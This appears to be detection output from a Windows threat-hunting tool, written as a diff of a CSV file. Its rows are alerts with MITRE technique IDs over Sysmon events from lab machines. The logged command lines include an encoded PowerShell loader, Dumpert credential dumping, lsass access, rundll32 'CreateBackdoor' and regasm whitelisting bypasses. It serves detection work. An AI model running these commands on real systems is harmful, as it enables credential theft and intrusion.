+ Microsoft-Windows-Sysmon/Operational
+ PC04.example.corp
+
+
+
+
+
+ 2019-03-17 20:18:09.593
+ 365ABB72-AB81-5C8E-0000-00102E9E0C00
+ 3892
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
+ C:\Windows\system32\
+ PC04\IEUser
+ 365ABB72-A960-5C8E-0000-002004C00300
+ 0x3c004
+ 1
+ High
+ MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-173D-5C8F-0000-00102A6A0000
+ 608
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch
+
+",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5275
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC04.example.corp
+
+
+
+
+
+ 2019-03-17 20:18:09.593
+ 365ABB72-AB81-5C8E-0000-00102E9E0C00
+ 3892
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
+ C:\Windows\system32\
+ PC04\IEUser
+ 365ABB72-A960-5C8E-0000-002004C00300
+ 0x3c004
+ 1
+ High
+ MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-173D-5C8F-0000-00102A6A0000
+ 608
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch
+
+",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5880
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.070
+ 365ABB72-3D6D-5CEB-0000-0010575CFF00
+ 2644
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 23
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 16:58:14.781
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\vaultcli.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Credential Vault Client Library
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17286
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-13 18:03:19.482
+ 365ABB72-B167-5CD9-0000-0010EE150C00
+ 2372
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /c notepad.exe
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-B0EC-5CD9-0000-0020DE330100
+ 0x133de
+ 1
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0EC-5CD9-0000-0010D9D20000
+ 944
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243547
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.122
+ 747F3D96-9F69-5E75-0000-0010DE732000
+ 6400
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 23
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 16:58:14.781
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\vaultcli.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Credential Vault Client Library
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243547
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.122
+ 747F3D96-9F69-5E75-0000-0010DE732000
+ 6400
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243547
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.122
+ 747F3D96-9F69-5E75-0000-0010DE732000
+ 6400
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"
+
+
+
+
+ 8
+ 2
+ 4
+ 8
+ 0
+ 0x8000000000000000
+
+
+ 9060
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 12:43:43.784
+ 365ABB72-4055-5CC8-0000-0010769D0B00
+ 1532
+ \\VBOXSVR\HTools\voice_mail.msg.exe
+ 365ABB72-3FE0-5CC8-0000-00107E590000
+ 492
+ C:\Windows\System32\lsass.exe
+ 1744
+ 0x001A0000
+
+
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4923
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:34.234
+ 747F3D96-662E-5D3F-0000-0010C2048900
+ 1976
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net start CDPSvc ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 244336
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 12:35:55.872
+ 747F3D96-0A2B-5E76-0000-0010C02A3D00
+ 7072
+ C:\Windows\System32\net.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net.exe
+ net start CDPSvc
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-06A4-5E76-0000-002043DE0200
+ 0x2de43
+ 1
+ High
+ SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
+ 747F3D96-077C-5E76-0000-0010A5BA2300
+ 5068
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5877
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:16.960
+ 365ABB72-3D6C-5CEB-0000-00107257FF00
+ 3484
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\InetSRV\appcmd.exe" list vdir /text:physicalpath
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 238378
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ alice.insecurebank.local
+
+
+
+
+
+ 2019-06-21 07:35:50.093
+ ECAD0485-88D6-5D0C-0000-001007AA1D00
+ 1568
+ C:\Windows\System32\rundll32.exe
+ 6.3.9600.17415 (winblue_r4.141028-1500)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump
+ C:\Users\administrator\Desktop\x64\
+ insecurebank\Administrator
+ ECAD0485-87E3-5D0C-0000-0020266A0F00
+ 0xf6a26
+ 2
+ High
+ SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C
+ ECAD0485-8897-5D0C-0000-0010A2FA1C00
+ 3964
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 238378
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ alice.insecurebank.local
+
+
+
+
+
+ 2019-06-21 07:35:50.093
+ ECAD0485-88D6-5D0C-0000-001007AA1D00
+ 1568
+ C:\Windows\System32\rundll32.exe
+ 6.3.9600.17415 (winblue_r4.141028-1500)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump
+ C:\Users\administrator\Desktop\x64\
+ insecurebank\Administrator
+ ECAD0485-87E3-5D0C-0000-0020266A0F00
+ 0xf6a26
+ 2
+ High
